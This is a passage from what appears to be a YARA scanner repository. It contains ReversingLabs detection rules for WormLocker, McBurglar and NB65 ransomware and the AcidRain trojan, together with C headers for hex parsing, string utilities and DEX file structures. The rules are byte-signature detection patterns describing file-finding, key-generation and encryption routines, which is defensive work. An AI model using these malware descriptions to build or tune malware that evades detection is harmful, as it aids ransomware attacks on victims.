38 | 39 | $encrypt_files_p1 = { 40 | 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? 41 | ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? 42 | ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19 43 | 73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? 44 | ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 45 | 07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ?? 46 | ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ?? 47 | ?? ?? ?? DE ?? 26 DE ?? 2A 48 | } 49 | 50 | $encrypt_files_p2 = { 51 | 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ?? 52 | ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 53 | 73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ?? 54 | ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ?? 55 | ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? 56 | ?? DC 26 DE ?? 02 2A 11 ?? 2A 57 | } 58 | 59 | condition: 60 | uint16(0) == 0x5A4D and 61 | ( 62 | $find_files 63 | ) and 64 | ( 65 | $generate_key 66 | ) and 67 | ( 68 | all of ($encrypt_files_p*) 69 | ) 70 | } -------------------------------------------------------------------------------- /src/lib/hex_grammar.h: -------------------------------------------------------------------------------- 1 | /* A Bison parser, made by GNU Bison 3.8.2. */ 2 | 3 | /* Bison interface for Yacc-like parsers in C 4 | 5 | Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, 6 | Inc. 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | This program is distributed in the hope that it will be useful, 14 | but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | GNU General Public License for more details. 17 | 18 | You should have received a copy of the GNU General Public License 19 | along with this program. If not, see . */ 20 | 21 | /* As a special exception, you may create a larger work that contains 22 | part or all of the Bison parser skeleton and distribute that work 23 | under terms of your choice, so long as that work isn't itself a 24 | parser generator using the skeleton or a modified version thereof 25 | as a parser skeleton. Alternatively, if you modify or redistribute 26 | the parser skeleton itself, you may (at your option) remove this 27 | special exception, which will cause the skeleton and the resulting 28 | Bison output files to be licensed under the GNU General Public 29 | License without this special exception. 30 | 31 | This special exception was added by the Free Software Foundation in 32 | version 2.2 of Bison. */ 33 | 34 | /* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, 35 | especially those whose name start with YY_ or yy_. They are 36 | private implementation details that can be changed or removed. */ 37 | 38 | #ifndef YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED 39 | # define YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED 40 | /* Debug traces. */ 41 | #ifndef YYDEBUG 42 | # define YYDEBUG 0 43 | #endif 44 | #if YYDEBUG 45 | extern int hex_yydebug; 46 | #endif 47 | 48 | /* Token kinds. */ 49 | #ifndef YYTOKENTYPE 50 | # define YYTOKENTYPE 51 | enum yytokentype 52 | { 53 | YYEMPTY = -2, 54 | YYEOF = 0, /* "end of file" */ 55 | YYerror = 256, /* error */ 56 | YYUNDEF = 257, /* "invalid token" */ 57 | _BYTE_ = 258, /* _BYTE_ */ 58 | _MASKED_BYTE_ = 259, /* _MASKED_BYTE_ */ 59 | _NOT_BYTE_ = 260, /* _NOT_BYTE_ */ 60 | _MASKED_NOT_BYTE_ = 261, /* _MASKED_NOT_BYTE_ */ 61 | _NUMBER_ = 262 /* _NUMBER_ */ 62 | }; 63 | typedef enum yytokentype yytoken_kind_t; 64 | #endif 65 | /* Token kinds. */ 66 | #define YYEMPTY -2 67 | #define YYEOF 0 68 | #define YYerror 256 69 | #define YYUNDEF 257 70 | #define _BYTE_ 258 71 | #define _MASKED_BYTE_ 259 72 | #define _NOT_BYTE_ 260 73 | #define _MASKED_NOT_BYTE_ 261 74 | #define _NUMBER_ 262 75 | 76 | /* Value type. */ 77 | #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED 78 | union YYSTYPE 79 | { 80 | #line 78 "hex_grammar.y" 81 | 82 | int64_t integer; 83 | RE_NODE *re_node; 84 | 85 | #line 86 "hex_grammar.h" 86 | 87 | }; 88 | typedef union YYSTYPE YYSTYPE; 89 | # define YYSTYPE_IS_TRIVIAL 1 90 | # define YYSTYPE_IS_DECLARED 1 91 | #endif 92 | 93 | 94 | 95 | 96 | int hex_yyparse (void *yyscanner, HEX_LEX_ENVIRONMENT *lex_env); 97 | 98 | 99 | #endif /* !YY_HEX_YY_HEX_GRAMMAR_H_INCLUDED */ 100 | -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_WormLocker : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "WORMLOCKER" 12 | description = "Yara rule that detects WormLocker ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "WormLocker" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $set_environment = { 21 | 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? 22 | ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? 23 | ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? 24 | ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? 25 | ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 | 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? 27 | ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ?? 28 | ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 29 | 11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A 30 | } 31 | 32 | $find_files = { 33 | 00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? 34 | ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? 35 | ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? 36 | ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ?? 37 | ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11 38 | ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 39 | 13 ?? 11 ?? 2D ?? 2A 40 | } 41 | 42 | $encrypt_files_p1 = { 43 | 00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 44 | ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 45 | 00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? 46 | ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 47 | 00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 48 | 02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? 49 | ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 50 | 2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A 51 | } 52 | 53 | $encrypt_files_p2 = { 54 | 00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? 55 | ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $set_environment 62 | ) and 63 | ( 64 | $find_files 65 | ) and 66 | ( 67 | all of ($encrypt_files_p*) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_McBurglar : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "MCBURGLAR" 12 | description = "Yara rule that detects McBurglar ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "McBurglar" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? 22 | ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? 23 | ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? 24 | ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ?? 25 | ?? ?? 00 2A 26 | } 27 | 28 | $encrypt_files_p1 = { 29 | 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ?? 30 | 7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 31 | 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A 32 | } 33 | 34 | $encrypt_files_p2 = { 35 | 00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? 36 | ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F 37 | ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06 38 | 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? 39 | ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? 40 | ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ?? 41 | ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 42 | 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 43 | 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 44 | ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE 45 | ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A 46 | } 47 | 48 | $find_files = { 49 | 00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 50 | 00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11 51 | ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 52 | ?? 00 DE ?? 26 00 00 DE ?? 2A 53 | } 54 | 55 | $generate_salt = { 56 | 00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00 57 | 00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 58 | 13 ?? 2B ?? 11 ?? 2A 59 | } 60 | 61 | condition: 62 | uint16(0) == 0x5A4D and 63 | ( 64 | $setup_env 65 | ) and 66 | ( 67 | $find_files 68 | ) and 69 | ( 70 | $generate_salt 71 | ) and 72 | ( 73 | all of ($encrypt_files_p*) 74 | ) 75 | } -------------------------------------------------------------------------------- /src/lib/include/yara/strutils.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2014. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STRUTILS_H 31 | #define YR_STRUTILS_H 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | #if defined(_WIN32) 40 | 41 | #if !defined(PRIu64) 42 | #define PRIu64 "I64u" 43 | #endif 44 | 45 | #if !defined(PRIu32) 46 | #define PRIu32 "I32u" 47 | #endif 48 | 49 | #if !defined(PRIx64) 50 | #define PRIx64 "I64x" 51 | #endif 52 | 53 | #if !defined(PRId64) 54 | #define PRId64 "I64d" 55 | #endif 56 | 57 | #if !defined(PRIi32) 58 | #define PRIi32 "I32i" 59 | #endif 60 | 61 | #if !defined(PRIi64) 62 | #define PRIi64 "I64i" 63 | #endif 64 | 65 | #if !defined(PRIo64) 66 | #define PRIo64 "I64o" 67 | #endif 68 | 69 | #else 70 | #include 71 | #endif 72 | 73 | // Cygwin already has these functions. 74 | #if defined(_WIN32) && !defined(__CYGWIN__) 75 | #if defined(_MSC_VER) && _MSC_VER < 1900 76 | 77 | #if !defined(snprintf) 78 | #define snprintf _snprintf 79 | #endif 80 | 81 | #endif 82 | #define strcasecmp _stricmp 83 | #define strncasecmp _strnicmp 84 | #endif 85 | 86 | uint64_t xtoi(const char* hexstr); 87 | 88 | #if !HAVE_STRLCPY && !defined(strlcpy) 89 | size_t strlcpy(char* dst, const char* src, size_t size); 90 | #endif 91 | 92 | #if !HAVE_STRLCAT && !defined(strlcat) 93 | size_t strlcat(char* dst, const char* src, size_t size); 94 | #endif 95 | 96 | #if !HAVE_MEMMEM && !defined(memmem) 97 | void* memmem( 98 | const void* haystack, 99 | size_t haystack_size, 100 | const void* needle, 101 | size_t needle_size); 102 | #endif 103 | 104 | int strnlen_w(const char* w_str); 105 | 106 | int strcmp_w(const char* w_str, const char* str); 107 | 108 | size_t strlcpy_w(char* dst, const char* w_src, size_t n); 109 | 110 | #endif 111 | 112 | int yr_isalnum(const uint8_t* s); 113 | 114 | void yr_vasprintf(char** strp, const char* fmt, va_list ap); 115 | 116 | void yr_asprintf(char** strp, const char* fmt, ...); 117 | -------------------------------------------------------------------------------- /src/lib/include/yara/dex.h: -------------------------------------------------------------------------------- 1 | #ifndef _DEX_H 2 | #define _DEX_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #define DEX_FILE_MAGIC_035 "dex\n035\x00" 9 | #define DEX_FILE_MAGIC_036 "dex\n036\x00" 10 | #define DEX_FILE_MAGIC_037 "dex\n037\x00" 11 | #define DEX_FILE_MAGIC_038 "dex\n038\x00" 12 | #define DEX_FILE_MAGIC_039 "dex\n039\x00" 13 | 14 | #pragma pack(push, 1) 15 | 16 | typedef struct 17 | { 18 | uint8_t magic[8]; 19 | uint32_t checksum; 20 | uint8_t signature[20]; 21 | uint32_t file_size; 22 | uint32_t header_size; 23 | uint32_t endian_tag; 24 | uint32_t link_size; 25 | uint32_t link_offset; 26 | uint32_t map_offset; 27 | uint32_t string_ids_size; 28 | uint32_t string_ids_offset; 29 | uint32_t type_ids_size; 30 | uint32_t type_ids_offset; 31 | uint32_t proto_ids_size; 32 | uint32_t proto_ids_offset; 33 | uint32_t field_ids_size; 34 | uint32_t field_ids_offset; 35 | uint32_t method_ids_size; 36 | uint32_t method_ids_offset; 37 | uint32_t class_defs_size; 38 | uint32_t class_defs_offset; 39 | uint32_t data_size; 40 | uint32_t data_offset; 41 | } dex_header_t; 42 | 43 | typedef struct 44 | { 45 | uint32_t string_data_offset; 46 | } string_id_item_t; 47 | 48 | typedef struct 49 | { 50 | uint32_t utf16_size; 51 | } string_data_item_t; 52 | 53 | typedef struct 54 | { 55 | uint32_t descriptor_idx; 56 | } type_id_item_t; 57 | 58 | typedef struct 59 | { 60 | uint32_t shorty_idx; 61 | uint32_t return_type_idx; 62 | uint32_t parameters_offset; 63 | } proto_id_item_t; 64 | 65 | typedef struct 66 | { 67 | uint16_t class_idx; 68 | uint16_t type_idx; 69 | uint32_t name_idx; 70 | } field_id_item_t; 71 | 72 | typedef struct 73 | { 74 | uint16_t class_idx; 75 | uint16_t proto_idx; 76 | uint32_t name_idx; 77 | } method_id_item_t; 78 | 79 | typedef struct 80 | { 81 | uint32_t class_idx; 82 | uint32_t access_flags; 83 | uint32_t super_class_idx; 84 | uint32_t interfaces_offset; 85 | uint32_t source_file_idx; 86 | uint32_t annotations_offset; 87 | uint32_t class_data_offset; 88 | uint32_t static_values_offset; 89 | } class_id_item_t; 90 | 91 | typedef struct 92 | { 93 | uint32_t static_fields_size; 94 | uint32_t instance_fields_size; 95 | uint32_t direct_methods_size; 96 | uint32_t virtual_methods_size; 97 | } class_data_item_t; 98 | 99 | typedef struct 100 | { 101 | uint32_t field_idx_diff; 102 | uint32_t access_flags; 103 | } encoded_field_t; 104 | 105 | typedef struct 106 | { 107 | uint32_t method_idx_diff; 108 | uint32_t access_flags; 109 | uint32_t code_off; 110 | } encoded_method_t; 111 | 112 | typedef struct 113 | { 114 | uint16_t registers_size; 115 | uint16_t ins_size; 116 | uint16_t outs_size; 117 | uint16_t tries_size; 118 | uint32_t debug_info_off; 119 | uint32_t insns_size; 120 | } code_item_t; 121 | 122 | typedef struct 123 | { 124 | uint16_t type; 125 | uint16_t unused; 126 | uint32_t size; 127 | uint32_t offset; 128 | } map_item_t; 129 | 130 | typedef struct _DEX 131 | { 132 | const uint8_t* data; 133 | size_t data_size; 134 | dex_header_t* header; 135 | YR_OBJECT* object; 136 | } DEX; 137 | 138 | #define fits_in_dex(dex, pointer, size) \ 139 | ((size_t) size <= dex->data_size && (uint8_t*) (pointer) >= dex->data && \ 140 | (uint8_t*) (pointer) <= dex->data + dex->data_size - size) 141 | 142 | #define struct_fits_in_dex(dex, pointer, struct_type) \ 143 | fits_in_dex(dex, pointer, sizeof(struct_type)) 144 | 145 | #pragma pack(pop) 146 | 147 | #endif 148 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.NB65.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_NB65 : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "NB65" 12 | description = "Yara rule that detects NB65 ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "NB65" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 22 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 23 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 24 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 25 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ?? 26 | 0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ?? 27 | 8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50 28 | ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0 29 | 85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 30 | 8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ?? 31 | ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 32 | } 33 | 34 | $find_files = { 35 | 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 36 | 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 37 | 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 38 | 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? 39 | ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 40 | 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 41 | 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? 42 | ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 43 | } 44 | 45 | $enum_procs = { 46 | 33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D 47 | 42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B 48 | 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 49 | ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ?? 50 | 83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ?? 51 | ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 52 | 0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 53 | E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ?? 54 | ?? 8B E5 5D C3 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $enum_procs 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/trojan/Linux.Trojan.AcidRain.yara: -------------------------------------------------------------------------------- 1 | rule Linux_Trojan_AcidRain : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "ACIDRAIN" 12 | description = "Yara rule that detects AcidRain trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "AcidRain" 16 | tc_detection_factor = 5 17 | 